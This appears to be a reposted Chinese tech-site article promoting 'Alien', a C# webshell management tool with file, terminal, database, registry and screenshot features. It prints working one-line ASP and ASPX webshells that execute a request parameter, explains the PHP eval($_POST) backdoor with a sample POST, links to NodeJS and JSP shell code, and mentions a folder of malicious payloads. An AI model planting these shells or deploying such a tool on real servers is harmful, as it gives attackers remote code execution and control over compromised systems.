全球最实用的IT互联网信息网站!

AI人工智能P2P分享&下载搜索网页发布信息网站地图

当前位置:诺佳网 > 电子/半导体 > 处理器/DSP >

介绍一款新的webshell管理工具

时间:2023-07-31 10:42

人气:

作者:admin

标签: Linux系统  s  伺服器  PHP  SQL 

导读:由于NodeJS特性, 原理跟一般php asp aspx等动态语言的shell不同,...

项目简介

语言

C# .NET Framework V4.8

功能

File Manager (可显示图片, 可SearchFile)

虚拟终端

数据库

注册表

监控

截图

系统信息

项目描述

一句话木马

一句话木马是在渗透测试中用来控制服务器的工具

强大之处在于木马本身体积小,不易发现

以下是最简单的一句话木马

PHP
ASP <%execute(request("password"))%>
ASPX <%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>当然, Alien还可以使用asmx, ashx等等的Webshell。
NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt
关于JSP webshell

目前只有比较原始的菜刀版本, 之后可能会加上蚁剑和冰蝎

shell有进行更改, 新增了可以显示图片的功能

关于NodeJS webshell

由于NodeJS特性, 原理跟一般php asp aspx等动态语言的shell不同,

NodeJS目的重在管理而非渗透

伺服器

Windows, Linux, Unix, MacOS

Database管理

MySQL :PHP 交通

原理

以PHP为例子, eval()可以把string以PHP Code去执行,

如果eval()中带有可控变量,那么就可以执行任意代码。

如eval($_POST['a']);

HTTP POST a=phpinfo(); 就可以执行phpinfo();

注意!

工具Payloads文件夹内有符合恶意程序的Payload, 可能会被防毒删除

目前只有删减版,但部份代码没有删除,Disassemble应该会有奇怪但无法使用的东西

图片

fb2163e0-2f39-11ee-815d-dac502259ad0.png

fb729300-2f39-11ee-815d-dac502259ad0.png

fb90003e-2f39-11ee-815d-dac502259ad0.png

fbfc424e-2f39-11ee-815d-dac502259ad0.png

fc4236aa-2f39-11ee-815d-dac502259ad0.png

fc586498-2f39-11ee-815d-dac502259ad0.png

fc9a78b0-2f39-11ee-815d-dac502259ad0.png

fcf74716-2f39-11ee-815d-dac502259ad0.png

fd274132-2f39-11ee-815d-dac502259ad0.png

fd7229cc-2f39-11ee-815d-dac502259ad0.png

fd84c564-2f39-11ee-815d-dac502259ad0.png

fdcae9f4-2f39-11ee-815d-dac502259ad0.png






审核编辑:刘清

温馨提示:以上内容整理于网络,仅供参考,如果对您有帮助,留下您的阅读感言吧!
相关阅读
本类排行
相关标签
本类推荐

CPU | 内存 | 硬盘 | 显卡 | 显示器 | 主板 | 电源 | 键鼠 | 网站地图

Copyright © 2025-2035 诺佳网 版权所有 备案号:赣ICP备2025066733号
本站资料均来源互联网收集整理,作品版权归作者所有,如果侵犯了您的版权,请跟我们联系。

关注微信